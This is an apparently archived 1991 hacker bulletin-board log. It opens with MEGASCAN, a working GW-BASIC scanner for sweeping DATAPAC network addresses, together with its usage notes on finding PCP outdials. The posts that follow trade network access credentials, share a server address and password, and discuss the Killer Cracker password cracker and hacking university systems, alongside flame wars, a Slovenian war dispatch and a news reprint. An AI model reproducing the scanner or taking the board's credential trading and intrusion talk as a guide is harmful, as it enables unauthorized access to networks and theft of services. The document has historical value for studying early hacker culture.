------------ CUT HERE ---------------------------------------------------------

1 HFILE$="C:\path\filename.ext"      :REM File path\name session is logged to
2 DDIAL$="ATS=0E1Q0V1X4 DT 555-1234" :REM INIT string + DATAPAC dialup
3 SPEED=1200  :REM  Set your desired speed 300-9600 baud
4 COMPORT=1   :REM  Set your desired COM:port 1-4
5 TIME1=900   :REM  Waits TIME1 then ^P CLR's the Connection (if there is one)
6 TIME2=200   :REM  Waits TIME2 before sending a new NUA


7 REM
8 REM ***** MODIFY lines 1,2,3,4,5 and 6 for your system. *****
9 REM

10 HACKLOG=1:CLOSE:SCREEN 0:WIDTH 80:CLS:KEY OFF:GOSUB 99:LOCATE 1,1:PRINT "MEG~
~A DATAPAC NUA Scanner  V1.0":PRINT "By Mayhem (MSU)"

20 O$="com"+right$(str$(comport),1)+":"+STR$(SPEED)+",n,8,1,CD,DS,RS,CS":OPEN O~
~$ AS #1:OPEN HFILE$ FOR OUTPUT AS #2:PRINT #1,"AT"

30 ON COM(comport) GOSUB 95
40 COM(comport) ON
50 A$=INKEY$:IF A$="" THEN 50
55 A=ASC(A$)
60 IF A=26 THEN PRINT #1,DDIAL$:GOTO 50
70 IF A=24 THEN GOTO 100
90 PRINT #1,A$;:GOTO 50
95 ALL=LOC(1):IF ALL<1 THEN RETURN
96 B$=INPUT$(ALL,#1):PRINT B$;:IF HACKLOG THEN PRINT #2,B$;
97 RETURN

99 LOCATE 25,2:PRINT "-=<< MEGASCAN by Mayhem >>=-   CTRL-Z dials  &  CTRL-X st~
~arts scan":RETURN

100 GOSUB 200:INPUT "ENTER PREFIX ";P$:IF P$="" THEN BEEP:PRINT:PRINT " ** NOTH~
~ING ** ??? I hope you're planning on ABORTING! :)"

110 PRINT:INPUT "ENTER SUFFIX ";S

120 A=ASC(INKEY$+CHR$(0)):O$=P$+RIGHT$(STR$(S),LEN(STR$(S))-1):IF A=24 THEN A=0~
~:FOR L=1 TO 500:A$=INKEY$:NEXT:PRINT:BEEP:PRINT "** SCAN ABORTED **":PRINT:PRI~
~NT"ONLINE:":GOTO 50 ELSE IF A=1 THEN CLOSE:PRINT:BEEP:PRINT" ** Finishing **":~
~CLOSE:END

130 PRINT #1,O$:PRINT #2,O$:PRINT O$
150 FOR L=1 TO TIME1*10:NEXT:HACKLOG=0:PRINT #1,CHR$(16);"clr"

155 A=ASC(INKEY$+CHR$(0)):IF A=24 THEN A=0:FOR L=1 TO 500:A$=INKEY$:NEXT:PRINT:~
~BEEP:PRINT "** SCAN ABORTED **":PRINT:PRINT "ONLINE:": GOTO 50 ELSE IF A=1 THE~
~N CLOSE:PRINT:BEEP:PRINT" ** Finishing **":CLOSE:END

160 FOR L=1 TO TIME2*10:NEXT:S=S+1:HACKLOG=1:GOTO 120

200 PRINT:PRINT" OK. You must enter a PREFIX and a SUFFIX. The PREFIX+SUFFIX co~
~mbo

205 PRINT" will be the starting adress. Basicly, the PREFIX is stored as a STRI~
~NG"

210 PRINT" and the SUFFIX is a number, which is incremented. The suffix *CANNOT~
~* "

220 PRINT" be larger than 7 digits, and must begin with a non-zero digit."
230 PRINT:PRINT" TWO EXAMPLES:"
260 PRINT:PRINT" To start at 13106001158   = PREFIX 1310    SUFFIX 6001158 "
270 PRINT" To start at 1311041500001 = PREFIX 1311041 SUFFIX 500001"

280 PRINT:PRINT" The suffix is incremented with each try, but, will start spewi~
~ng"

300 PRINT" out exponentials if it goes over 7 digits in length."
310 PRINT:PRINT" CTRL-X ABORTS scan. CTRL-A FINISHES scan, closes file and ENDs"
320 PRINT:RETURN

------------ CUT HERE ---------------------------------------------------------



=========================

Message 124
From mayhem at 14:09:59 on Wed Jul  3
Subject: MEGASCAN.doc



       **  MegaScan Version 1.0
     ****  For DATAPAC only
       **  By Mayhem (Midnite Society)



DISCLAIMER:  I have only written this program as an example. If you use it
             I cannot be held responsible. If you dont agree with this
             dont download and/or run it.


The program is written for IBM's GWBASIC and, I dont know how compatible the
COMPORT and FILE i/o is with other types of BASICs, though it should work on
QuickBasic and other basic compilers of that nature, and wont work on BASICA.
This program's speed (9600baud maximum?) is available thanks to the

ON COM(1) GOSUB xxxx

routine which automatically interrupts and jumps to a subroutine if there is
incoming data in the serial buffer.

When starting up, list the first 9 lines and modify them to your system's specs
in line-mode or using your favorite text editor. Everything is pretty straight
forward, except for the TIME1 and TIME2 variables which will be discussed later
on.

The first entry is HFILE$="C:\path\filename.ext". This is the LOG file th
                                                                         at
the session will be logged to. Just change the entry to whatever you want.

The next entry is DDIAL$="ATS0=0E1Q0V1X4 DT 555-1234". This is the modem
initialization string and the dial string, all in one. Just change the
commands and/or the 555-1234 to the number of your desired DATAPAC dialup.

Modify the SPEED=xxxx entry to your desired baud rate.

Modify the COMPORT=x entry to your desired COMx: port

I'm too lazy to make entries for changing parity & stop bits etc. The default
settings are, of course 8 databits, no parity. If you must modify that stuff,
change the 8 N 1 in the line #20:

                                                   right here
                                                     | | |
20 O$="com"+right$(str$(comport),1)+":"+STR$(SPEED)+",n,8,1,CD,DS,RS,CS":OPEN O~

If you cant do this yourself, you're beyond help :)

Now, TERM1 and TERM2 are variables used in the time delay FOR NEXT loops.
This was written on a turbo-pc running at 6.5mhz. If you're on a 286/386
your gonna have to make some *drastic* changes to these entries.

TERM1: the length of time it waits after sending the NUA. Once done
       the programs transmits a CTRL-P CLR sequence, so, if it has
       connected, this will disconnect it, and move on.

TERM2: the length of time it waits after sending the clear sequence.
       then, it just loops back and sends the next NUA.

Just try different numbers. TERM1=900 TERM2=200 works fine for my PC.
A 386sx however would need maybe 27000 and 6000 respectively. The baud
rate you're at also will be a deciding factor.

The adress entry routine PREFIX+SUFFIX is pretty hairy, but I'm sure
you'll get the picture from the examples provided here and on the program.
This program could be used to scan for PCP outdials. If I needed the outdial
for Atlanta Georgia AC=404, I could use:

PREFIX: 1311040
SUFFIX: 400001

Which would give me a starting adress of 311040400001. Then I could come back
later, once its up to 311040400200 or more, close the file and END with CTRL-A,
then type SYSTEM to exit gwbasic, and then look at the log_file with a text
editor, or even use a ms-dos GREP program to weed out useful lines.

If you need help with anything, leave me e-mail here.
or usenet mail to:  mayhem@paranoia.uafcs.alaska.edu

 Enjoy!

 Brought to u by Mayhem (Cliff Burton)



=========================
Message 125
From gauloise at 16:19:44 on Wed Jul  3
Subject: Slovenia

Hi folks,
I just
       talked to a guy called STANE on LINA. He is a programmer
in Maribor,Slovenia and asked me to forward his mail to all the people
I know. Please do the same. Give it, e-mail it through n e net u can think
of, because slovenia is beng killed by yugoslavian army.
Please excuse hi poor english but I am sure you will get the meaning.
If n e 1 of you knows n e nuas in Yugoslavia, tell me. We should try to
destract the informationflow in yugoslavia in order to support the freedom
forces of slovenia.
ok guys i count on you.
SEND THIS MAIL TO NE1 YOU KNOW. THERE IS MORE TO COME.
read



    #1           3-JUL-1991 13:55:30.21                                     MAIL


From:   PSI%ITAPAC.022016210020131::STANE        "Stane Bo`i~"

To:     PSI%622222800173::GAULOISE

CC:

Subj:   Only some hints about situation in YU, about war in Slovenia



Hello my friends!



       I'm listening to the radio again and  hear  that  army  still  don't

    respect armistice. They're still attacking on some places  of  Slovenia

    instead of four items, accepted yesterday on  meeting  with  federation

    president  Mesic  and  federation  government   member   of   Macedonia

    Tuporkovski.



       Today since 10:00 am, red cross will deliver food and sanitary  with

    helicopters. Our TV will record all material  exchanging  if  it'll  be

    possible. We still don't believe because people with red cross sign  on

    their body was shutting on civil people when they came with helicopters

    to deliver food.



Press RETURN for more...



MAIL>



    #1           3-JUL-1991 13:55:30.21                                     MAIL


       Army still didn't answer on four items, we  accepted  yesterday.  It

    seems that they won't answer on anything. General Adzic said on  TV  of

    Belgrade that Slovenia must suffer because we attacked them and  fought

    cruel fight against army which wanted only peace and to do a job, which

    was ordered from main command center.



       Today, instead of agreement, 180 tanks (yes 180!!) started to  drive

    from Belgrade to Zagreb. They divided already in three groups for three

    directions. In Slovenia is right now about 500 tanks. Many of them  are

    destroyed, some of them are still in barracks and  wait  for  order  to

    attack. Army is still trying to keep  its  authority  in  YU.  Army  is

    playing dirty political games because of its existence.  This  army  is

    multi-national and everywhere they will attack, it will be an attack on

    native people.



       Yesterday they destroyed many town in  Slovenia,  they  killed  many

    civil people and many soldiers. They attacked  many  of  TV  and  radio

    antennas to get fuly information blocade.



Press RETURN for more...



MAIL>



    #1           3-JUL-1991 13:55:30.21                                     MAIL


       Now we agree that all troops will return in their barracks but  they

    don't do that. Opposite! They're trying to continue straight on.



       General  Adzic  and  other  generals   reactions   including   their

    emotionals. Don't understand me wrong. This emotionals are attached  to

    their army, because in these days we were using  words:  YU  occupation

    army, etc. General Adzic sent a letter to our government  in  Ljubljana

    (Lubiana) and it was written that army will send  specialists  to  pull

    them from badger's lair and....



       Remember that in case if we did let army to establish  full  control

    on our borders, it won't be solution for all problems, it  won't  avoid

    human sacrifices. We discovered secret plans of army  and  these  plans

    are really horrible. They planned to establish new government here,  to

    protect from division of YU BUT in these 'wishes'  they  were  able  to

    'suffocate' any democration, any resistance of people here. In case  of

    resistance they already have prepared another  part  of  plan.  Shortly

    described: destroy all you see. And today they  do  that.  They  really

    didn't expect so hard resistance.



Press RETURN for more...



MAIL>



    #1           3-JUL-1991 13:55:30.21                                     MAIL



       In moment when I'm writing this mail, I'm listening to the radio and

    it is reporting that army is still attacking and lead its  troops  into

    destroying  and  killing.  Army  still  don't  respect  agreement.  Our

    Territory Defence are trying all the time to defend our democracy.



       Yesterday, Serbians finally recognized that TV, radio and  army  was

    lieng them. They were demonstrating in assembly  there  and  asking  to

    return their boys back to home. Boys's age is 18, 19, 20. I  know,  how

    is going life in barracks. I was in army last year. Many of  them  died

    and will die because officiers shut them in case of desertation.  There

    is still cca 3000 slovenians and thousands of other nations.  Who  will

    survive and come back? This  is  our  question,  this  is  question  of

    mothers and fathers in whole Yugoslavia.



       Is the freedom and democracy really so expensive?



       Well, I wrote you just  a  very  small  peace  of  all  things,  are

    happening here.



Press RETURN for more...



MAIL>



    #1           3-JUL-1991 13:55:30.21                                     MAIL



       Today we started another mobilization. Soldiers are tired  and  must

    be replaced. Maybe I should go too. We'll see.



       Please, report all your friends there about situation here. This  is

    a true.



                               Stane Bozic from Maribor city (Slovenia)



MAIL>

=========================
Message 126
From bliss at 00:34:08 on Thu Jul  4
Subject: shit...

People with Red Cross's on them shooting people, that sux...
Not that this compares with the above news, but does anybody know
the reason for dynapacs going down earlier today?  Its back up
now...
=========================

Message 127
From paragon at 11:45:08 on Thu Jul  4
Subject: AFROchat!!!

      ___  __    ___  _________  _________  __    ___  _________  ___________
     /  /\/  \  /  /\/  ______/\/  ___   /\/  \  /  /\/  ______/\/___   ____/\
    /  / /    \/  / /  /_____ \/  /\ /  / /    \/  / /  /_____ \ \  /  /\   \ \
   /  / /        / /  ______/\/  /  /  / /        / /  ______/\_\/\/  /  \___\/
  /  / /  /\    / /  /\     \/  /__/  / /  /\    / /  /_____ \ \  /  /   /
 /__/ /__/  \__/ /__/  \____/________/ /__/  \__/ /________/\_\/ /__/   /
 \  \ \  \  /\ \ \  \  /    \        \ \  \  /\ \ \        \ \   \  \  /
  \__\/\__\/  \_\/\__\/      \________\/\__\/  \_\/\________\/    \__\/

                        Brought To You By:  A. F. R. O.

                Internet Address: 130.212.010.102, Port 10069
                        Password: "efil4srekcah" for you lamers

                     NON-LOGGED - PHYSICALLY IMPOSSIBLE TO LOG

=========================


Message 128
From paragon at 13:10:24 on Thu Jul  4
Subject: corret inet address

INFONET is at 130.212.10.102, NOT 130.212.010.102 (the latter fucks up)

=========================

Message 129
From heartz at 21:59:05 on Thu Jul  4
Subject: happy

  Independence Day everyone.

    h.

=========================
Message 130
From djockey at 04:04:33 on Fri Jul  5
Subject: HACKBASE!!!

(MY) HackBase on Node Lina will soon be updated. (Hooray...) Any
suggestions, contact me here or on my VMB (800-326-1040, when answered,
dial 93005 in touchtones.) Later, Disk Jockey/WR!

=========================

Message 132
From einstein at 21:05:53 on Fri Jul  5
Subject: HP 48sx

Heya boys!!
Does anybody are a user of Hp 48sx??
What?
You don't know what is Hp 48sx??
Well it's a great scientific calculator
with programmable possibilities..
Well, I have some stuff for it
and I want to know if anyone of you guys are
an Hp 48 user ,because it will be great to trade our programs,games,
and tricks for this fantastic calc.
             write to einstein@lutzifer.uucp

thanks  bye!!!!

P.S. To proove that it's fantastic I want to tell you just that....
this connection is made with it...I've called Itapac -lutzifer
with my calc connected to a modem.
hehehehehe....


=========================

Message 134
From mayhem at 11:08:09 on Sat Jul  6
Subject: KillerCrack6.0


 KC 6.0 is out now.. who wants a copy? :)

 -mayhem-

=========================
Message 135
From blammo at 23:50:47 on Sat Jul  6
Subject: 3KC6

what it is?

=========================



Message 136
From cyclopz at 00:21:41 on Sun Jul  7
Subject: Trtsvc/Hackbase

Hey, I have an IDEA!!! STOP Calling QSD you lamers!

For those of you afflicted with QSD Jiotters i have a solution
use trtsvc(NUI No p[w) to call Node lINA it has a better chat
and as soon as someone fix's up hackbase it'll have File Transfers!
As an added Bonus its :Like LUTZIFER!! the NUA is on here
somewhere or if yer dumb, its 22222800173 use uit!
Latre DOWN WITH QSD! FOREVERRR!
CyClopz!...The Infamous

=========================
Message 137
From spirit at 05:54:10 on Mon Jul  8
Subject: KC6

Killer Cracker 6.0 standard is a passwd cracker by Doc Dissector
of (at one time anyways) PHA.  He also wrote NUAA and some other
utilities.  Anyhow, KC6 will run on just about anything, you just
give it a passwd file and a wordlist, it'll guess away.  Comes with
source.

So.


=========================
Message 138
From sirus at 06:49:34 on Mon Jul  8
Subject: dictionary?

Does anybody have another wordlist other than the two found
with killer cracker?

=========================
Message 139
From hstreet at 15:07:48 on Mon Jul  8
Subject: heh

well kill cracker is bullshit
it is for lamers who can't write thier own password cracker.
and afrochat is gone..forever. and will be crushed where ever it goes
probably threw rewt access.

/s

=========================


Message 140
From blammo at 19:03:07 on Mon Jul  8
Subject: things

blah...afrochat sucked anyway..
cyclopz-
it seems that every NUI posted on here dies within a week, so

i doubt trt will last much longer..plus, anyone with half a
brain doesn't need to use tymnet NUIs to reach here, so they don't
have to worry about how slow dynapac is.

=========================
Message 141
From tchhacky at 21:26:15 on Mon Jul  8
Subject: besides

the fact that I heard that dynapac was tracing

=========================
Message 142
From hstreet at 21:59:59 on Mon Jul  8
Subject: yes!

afrochgat did suck..thats why it
                                 went down..
oh well..i guess those shitheads that put it up didnt know
enough to keep it running
not much sense between doctor dissector and repo anyway
/

=========================
Message 143
From paradox at 23:02:09 on Mon Jul  8
Subject: 'afrochat'

I had nothing to do with 'afrochat' nor apc.  'nuff said.


                                                        - repo

=========================

Message 144
From paradox at 23:21:29 on Mon Jul  8
Subject: heh

Well actually i did have alot to do with it.
i Constantly beg doctor dissector for info and accounts
and help him spread everything he gets in order to kill it of fast
all i really do is hack boring .edu sites and collect anon ftp sites
i am getting up in the years and kinda lame so i have to do something
well..i made Afrochat with DD as a petty way to show up some of the MOD
members...but i confess..i cant keep up with them.
but me and DD will take the reigns as the kings of the hack/phreak world
now that they are gone.
we will tell smug lies behind thier back and assume lots of evil
nasty stuff about them.
well dont look at my poser statue..just like me for me.
BTW: mail me some cool accounts please? i am kinda low on good shit

              -repo

=========================
Message 145
From blammo at 00:19:06 on Tue Jul  9
Subject: dynapac

who cares if dynapac's tracing or buffering or any of those other
bullshit rumors.
those rumors have spread about every NUI ever in existance, and
even some that haven't.
as far as i'm concerned, it's all bullshit. but who cares. anyone
still using dynapac deserves to be "traced" or whatever. it's
a shitty NUI anyway.

=========================


Message 146
From lazer at 17:14:08 on Tue Jul  9
Subject: I guess...

Afrochat was kinda corny. Hey Blammo, we would all h
                                                    ave a million ways to get he
re if we did it like you did. Don't knock it. Your stepping stone could
be stolen. Or go down.


Hmmmm, that sure was an interesting post be repo!

=========================
Message 147
From private at 01:05:11 on Wed Jul 10
Subject: haha

MoD is DEAD... it died with Phiber Optic, don't try to deny that.

I did not set Afrochat up, I merely released the program
which can enable anyone to set any similar chat up, just
because I'm not as egotistical as "MoD" members
(or so they say they are! hah!) does not mean I am ignorant!
Rather, I challenge these "MoD" members' own words in stating
that they are the ignorant, and are the ones who enjoy
hacking "boring .edu sites"... if they even knew how to do
that!! Show yourself "MoD"... I am not afraid... I am not one
to hide my immature face behind the shadows of others or a
shield of ignorance like yourselves!

I challenge you, you who think yourselves as so "high and
allamighty"... you who do all that you state against me in your
defense of your own stupidity and idiocy!  Prove yourself!  Not to
all, but to ME if you dare.  Perhaps then, the lies and falsehoods
stated by your pitiful selves will be respected by even ME
whenever you choose to do so.

As for me, I am not afraid to share my information, because I do not
share in the insecurities of becomming obsolete!  I have the ability
to grow and expand my own intellect,
                                     not confined by the spoon
fed information given to your own kind, "MoD"!  And you
dare call yourself "MoD"... "Masters" of WHAT? you cannot even master
your own immaturity or insecurity.  Do not look at this message as a
retalitory statement against your flames, but look at it as a PUBLIC
disclosure of what "MoD" truely is, behind the immaturity and
falsehoods created by the "members" of the group, nothing but a group
of individuals who cannot adjust to the quickly changing world,
either the world of the hack or the world of "reality"; their
only hope for survival, to attempt to "prey" upon those who they
believe to be more insecure than themselves and perhaps even more
ignorant.  Unfortunately, they chose the wrong individual to
"prey" upon, for now, I shall prey upon "MoD"... hahahaha!

And remember, I FEAR NOT your petty attempts to shame me or
anyone else, whether they be in my company or not, because I have
enough faith in my own intellect, needing not to retaliate against your
idiotic remarks, but to expose the long-helf facade behind the
"real MoD".

Doctor Dissector
bbs.doctord@spies.com

=========================
Message 148
From private at 01:07:36 on Wed Jul 10
Subject: ahah... then again

maybe you guys think "ignorance is bliss"... haha... I for one, do not!

=========================
Message 149
From tchhacky at 20:20:49 on Wed Jul 10
Subject: A challenge?

Me thinks Doctor Dissector understands the old age of hacking

=========================


Message 150
From private at 03:54:06 on Thu Jul 11
Subject: But wait a minute...

But how do you discern between the old and the new?  The "new" appears
to be all the MoD wanna-be's and worshipers... now here I come
along and renounce MoD for what they really are... and they only
turn against me, and flame me, for my mothods of hacking or whatever MoD
may care to call it... I don't care!

You see, it is MoD who hates and despieses me for being one to
share the information I gather and learn, because it is MoD who
is afraid of losing their "competitive edge"?  Did not
"blammo" say that "i constantly beg doctor dissector for info
and accounts and help him spread everything he gets in order
to kill it off fast"... does this mean that MoD only has a limited

resource base, and maybe I am threatening their reign has the only
"good" hackers (haha... funny rumor, and well distrubuted, I'll give
you guys that much) as I slowly ~rteach those who might not know
quite as much the ropes?  See, guys, it's obvious you are afraid of
losing your, shall I call it, "superiority" over those who worship
and oh so modestly cringe in fear from your very name... losing that
"competitive edge"... coming down to the world of equality... is that so
bad?  In your eyes, it is, perhaps because that limited resource
base that you feed off of is becomming increasingly dry, as everyone
else begins to feed off of it... eventually... you will have nothing
ahead or behind all others who previously groveled at your feet.  But I
will not, because instead of eating out of the same resource
base, I shall grow, beyond your own limited capabilites... fear not,
MoD, perhaps it will be I, then, who will be teaching YOU, and these
words you speak against me will be forgotten.....

dd

=========================
Message 151
From blammo at 22:12:53 on Thu Jul 11
Subject: whoa..

"blammo" said no such thing.
i am not involved with MoD or this little quarrel of yours in any
way. i don't care w
                   ho knows what, or who hates who..just keep me
out of it! (how did i get in this anyway?!)
-midnite

=========================

Message 152
From haywire at 13:28:31 on Fri Jul 12
Subject: Nui

Okay then..If DYNAPAC1 is so fucking Lame..Then whats another GOOD NUI?
>T.bongb01 host only is fucked..Whats a good Valid Nui??

=========================
Message 153
From tchhacky at 20:40:41 on Fri Jul 12
Subject: nui's

do some scanning and find a pad that reaches here through telenet. Its not that
hard

=========================

Message 154
From haywire at 11:21:55 on Sun Jul 14
Subject: Pads

I have a Pad outta Telenet..But Everyone Talks so Highy about damned NUI's
so where the hell are they all??
Okay Dynapac1 and T.hongb01 sux whats a GOOD NUI??? or is your thoughts that all
 Nui's suck?? MOD SUX!! I read some Letters that NSA did and they're Pretty good
..you guys ever read some of their Letters or call their
							 Dist SItes??


=========================

Message 155
From cygnus at 22:53:31 on Mon Jul 15
Subject: isranet


    Could somebody post up the nua to an isranet gateway?
thanx

                                            phArmEr

=========================

Message 156
From ronnie at 02:25:09 on Tue Jul 16
Subject: pissed

ok.. i'm not blaming MoD (or maybe i am.. id ont know) it all depends
on who really did it.. somebody called up using my handle
on a guest account and was giving out So76's info..
i dont really appreciate it.. #1 it's very VERY chioldish and shows
the immaturity and insecurity of some people
#2 it show's how stupid some people are and how they try
to tear down what people have built for their owwn selfish benefits
instead of for the benefit of the whole.
#3 all of the above....
I do not and will not use tymnet unless absolutely necessary..
especially if its somethin
                          g that i dont want somebody to get their hands
on because the way I see it, certain people are watching
and trying to get every chance they can to destroy..
thats not what a real `hacker' is... if you want the definition... i'll be glad
to post it for you..
the real definition(s)... as for this group of people who think they
are so godly.. they are not `hackers' at all.. they are anarchists...
anarchy is immature as said before and NOBODY like anarchist.. even
anarchists hate themselves because they are always trying to top each others..
at least hackers try and help one another with useful information and
knowledge.... ahh.. this is bull.. i cant speak to them.. they are
too stupid to listen to what i have to say..
lateron
			ronnie

=========================
Message 157
From spirit at 06:01:47 on Tue Jul 16
Subject
       : Anarchists

Hmmmm.
Ronnie,
when u go look up the definition of 'hacker'
go back and look up 'anarchist' as well...
Me finks you got a bit mixed up there


Galileo
(From the Home of Omaha)

=========================
Message 158
From spirit at 09:09:31 on Tue Jul 16
Subject: erf


   I see what you are getting at, Gali, but let's not get stuck in
semantics.  I think we all understand exactly what Ronnie is saying here,
and I also believe most of us agree with him.  I know how he feels, being
impersonated, but add to this that someone was trying to 'frame' him, I
can certainly understand his displeasure.

So.

=========================
Message 159
From gauloise at 21:55:53 on Wed Jul 17
Subject: SUN

YO Guys,

now i spent 6000 bux on a sun and i ain't got no software
N e 1 know about some statistical software for sun staions ?

anx
gaul

=========================

Message 160
From cygnus at 01:36:06 on Thu Jul 18
Subject: anarchists

  Anarchists is a bad way of describing them if you are going to

use a term. I know a lot of anarchists who do go by a set of thier
own rules. And that is the difference here, these people who are
screwing off are doing it for their ego. Whether it is bad or good.
They are fuckin around and pissing everyone off and it is working!!
So the best thing to do would be ignore them, they are getting what
they want and it is being spoon fed to them. Everyone knows how
childish they are so there is no need to go into details but if they
are acting like children treat them like children man. They will
go away when they sense they are wasting their own time and ours.

   Dr. Dissector glad to see you back. I heard you came down to
SD in the summer? I heard it from Tak/Scan so i didn't take it as
anything to true. haha


=========================
Message 161
From galileo at 03:47:03 on Thu Jul 18
Subject: anarchists

Ok,
I am not in any way supporting these people

who don't do anything but annoy everyone.
I understand ronnie's situation and feel
very sympathetic.
What I was trying to say, is that "anarchists",
as far as I am aware, advocate freedom and respect
for everybody's else freedom too. This is the opposite
this people are doing. I feel calling them anarchists
does not suit them at all.

How about ... D I C K H E A D S  ? ?

Gali


=========================
Message 162
From infinity at 03:51:44 on Thu Jul 18
Subject: internet

someone explain how to get here through internet<terminus>.

Infinity

=========================

Message 163
From ronnie at 06:36:49 on Thu Jul 18
Subject: hmm

about the nonly way you could get on here through internet is to find
a site that is also hooked to an x.25 server, etc.. and go on from there
it could be a unix/vms/server or anything.
but there is no direct inet address that i know of..

=========================

Message 164
From orpheus at 13:56:30 on Thu Jul 18
Subject: bbs

Ok whose the asshole(s)  who  erased  my bbs on lina. well they  only
really erased the data file that had all the accounts/mail/posts
but that doesnt make  any diffrence. I'D wish you stupid assholes
would fuckin grow up . im trying to provide a SERVICE here and all
you can do is destroy it? WHaat the fuck is every ones problem.
im sick of your shit why dont you  reveal yourself you stupid pussy
so i can send you a little gift in the mail.
The SysOp of lina had an account on there and he's not gonna be too
happy when he learns a guest deleted everything. nether will the 20
users who had accounts there.


=========================

Message 165
From gauloise at 15:53:46 on Thu Jul 18
Subject: LINA BBS

Tanks a lot guys,

by killing Orph's BBS on Lina you erased some Information that was very
valuable for me.
!
FUCK YOU VERY MUCH !!!
#1 really has got to be elite to do that !
I wonder if it was COMSEC ??
 ___
/
\__\ auloise

=========================

Message 166
From netmuffi at 18:13:17 on Thu Jul 18
Subject: NUAs

Hello everyone
I've got some outdials, if you want one.
Please send me a short mail.

Bye

=========================

Message 167
From cyclopz at 19:00:56 on Thu Jul 18
Subject: Deletionm

Try This, WHo is the ELITE HACKBASE TERRORSIT?
Onc eyou find out who That Is, Youve gppt Your Deleter Orph
(Try CoH) das who did it, Yup!
Latez...CyClopz!

=========================

Message 168
From infinity at 19:56:24 on Thu Jul 18
Subject: idea

                      Hell Rad Fucking Hackers
                      H.   R.  F.      H.

                           |>etails

    The group is based on the fact that "Hackers" or so they are called
  are not as "Elite" or "Lame" as people label some to be.  The group
  is to be a base of learning where all hackers/phreakers share ideas
  about the hacking scene as well as share information about the
  networks.  By doing this, We, the Hackers/Phreakers of the United
  States and team up and learn just as most our sworn enemies have.
    Do you think the Telco workers put each other down and call the other
  childish names? No. Do you think the U.S. Government (FBI) put each
  other down? No. They work as a TEAM!  The H/P scene is working
  against it's own growth by putting people who might not know as much
  as the other down just because of their lack of knowledge.  I
  must say that to be "Elite" as it is put is to be Ominpotent and
  no one except for God is that.  In my mind we are basically all the
  same so why not just act the same instead of different.  If the H/P
  scene would work together instead of apart we might acomplish more.
    I am talking about the union of all groups and so on to join as one
  and to act and think as one.  United we stand, Divided We Fall.  If
  we all work together we can acomplish much more adn learn much faster
  than any individual can.  The body for instance is not one it is many
  combined as one.  If you look into anything it has parts, even the
  atom has parts.  Parts are a continueum of infinite proportions and
  taking advantage of this can definetly help graciously the H/P scene.
    Here is a sample situation of what might occur if the idea i am
  projecting right now would be in force.

    Sample Situation:

    Hacker #1: Hey Hacker#2, Hacker #3 got busted yesturday.
    Hacker #2: By who?
    Hacker #1: Tymnet!
    Hacker #2: How do you know this?
    Hacker #1: Because he lives near me and i saw the whole thing!
    Hacker #2: Shit, that sucks, well, hey i am going to start
               telling everyone what has happened.  I'll just
               pass around on the boards.
    Hacker #1: Ok, Later dude.
    Hacker #2: Later.
               <Click>

    Now here is an example of the same situation under t
                                                        he terms now.

    Hacker #1: Hey Hacker #2, Hacker #3 got busted yesturday.
    Hacker #2: By who?
    Hacker #1: Tymnet!
    Hacker #2: How do you know this?
    Hacker #1: Because he lives near me and i saw the whole thing!
    Hacker #2: Shit, that sucks, well, fuck him he was lame anyway!
    Hacker #1: Yeah, but he was cool sometimes.
    Hacker #2: Yeah, oh well shit happens.
    Hacker #1: True.  Well, I am staying away from tymnet.
    Hacker #2: Me too.  Everyone else can just get busted!
    Hacker #1: Yeah.... hehehehe.  Me and you won't! hahaha
    Hacker #2: Yeah... hahahah
    Hacker #1: Talk to you later.
    Hacker #2: Yeah, Later.
               <Click>

    This kinda of selfish attitude doesn't cut it in the real world and
  will eventually grow extinct just like the Blue Boxers did!
    Well, That's my idea so if you agree post some msgs which
  display your points about the idea and how you feel about it.

  Later...
  Infinity


=========================
Message 171
From spirit at 21:46:36 on Thu Jul 18
Subject: Terrorists

  I think I have to bring up an old argument and say that perhaps
"terrorist" is too respectful for this individual.  Terrorists all
have a goal, or at least a cause for doing what they do.  I think
'vandal', 'rapist', or 'molester' would suit the fellow just fine.
  As for his identity, Gaul, COMSEC is certainly not responsible for
this.  Like them or not, they are a legit
                                         imate company, and they do not
break into foreign systems (against the admin's will, even) and destroy
data.  Saying that CoH is responsible also seems incorrect to me.  I do
not know CoH, but he just doesn't seem to fit with those people I see as
responsible for this.
  Well first the 'hackbase' got waxed and now it's Orpheus's BBS?  I do
not know much about VMS, but shouldn't it offer some means of restricting
permissions to the BBS data except through the BBS itself?  I know in unix
this would easily be solved with a setuid bit set on a secure interface
(the BBS), and proper modes/ownership on the files.
  Oh well, I think you can see now why hackers are seen as 'Computer Thugs',
look who we have to represent us.

So.

=========================
Message 172
From heartz at 04:26:49 on Fri Jul 19
Subject: Hold on

a) why put a bbs on lina?

because it will just get nuked in any case, why not
put it on another damned vax?

b) if you have another account other than guest, upload the
files under that account, that way only they owner of the
account or system can delete it, I don't see the problem.

  h.

=========================

Message 173
From ronnie at 04:57:27 on Fri Jul 19
Subject: Wing

------------------------------

Date: July 8, 1991
From: Barbara E. McMullen & John F. McMullen
Subject: Secret Service Pays Hacker Call (Reprint from Newsbytes)

 SECRET SERVICE PAYS HACKER CALL 07/08/91

 NEW YORK, NEW YORK U.S.A., 1991 JULY 8 (NB) -- According to a
 Pennsylvania teenage "hacker" known as "Wing", agents of the United
 States Secret Service visited his home and that of some friends
 asking questions about rumors they had allegedly received about the
 planting of "July 4th logic bombs".

 Wing told Newsbytes that the agents arrived at his home and requested
 to talk to him about "rumors that he had planted logic bombs or
 viruses to go off on the 4th of July." Wing said that, on the advise
 of his father, he refused to discuss the matter with the agents, "The
 last time that the Secret Service was here my father told them not to
 come back again without a warrant so, when they did, I didn't talk to
 them. The whole thing is ridiculous anyhow. There was obviously no
 July 4th bombs and I certainly didn't plant any."

 Wing also said that agents visited friends of his and "made one who
 is new to computers feel that he was doing something wrong by trying
 to log onto bulletin boards."

 A Secret Service official, speaking to Newsbytes, confirmed that
 agents had attempted to interview Wing in relation to rumors of a
 July 4th attack on computer systems. The official also said that,
 because of Wing's juneville status, his parents have the right to
 deny the agents' request for an interview. The agent further said
 that, to his knowledge, there were no cases of computer attack on the
 4th of July.

 Other law enforcement officials had told Newsbytes, previous to the
 July 4th holiday, that they had received rumors of such a planned
 attack but that they had little substantive material upon which to
 base an investigation. There have also been recent reports to
 Newsbytes from sysops of university and foundation computer systems
 in the Boston, MA area of attempted unauthorized access by an
 individual purporting to be Wing.

------------------------------

     .
          .

=========================

Message 174
From faust at 19:43:02 on Fri Jul 19
Subject: LINA bbs...

Well I'd imagine that the sysop of LINA would be more tolerant of a bbs than the
 average
sysadmin of a hacked vax.. So I guess it'll get nuked only if some
stupid user keeps doing it, so if you can protect it better, I'd
say go for it..
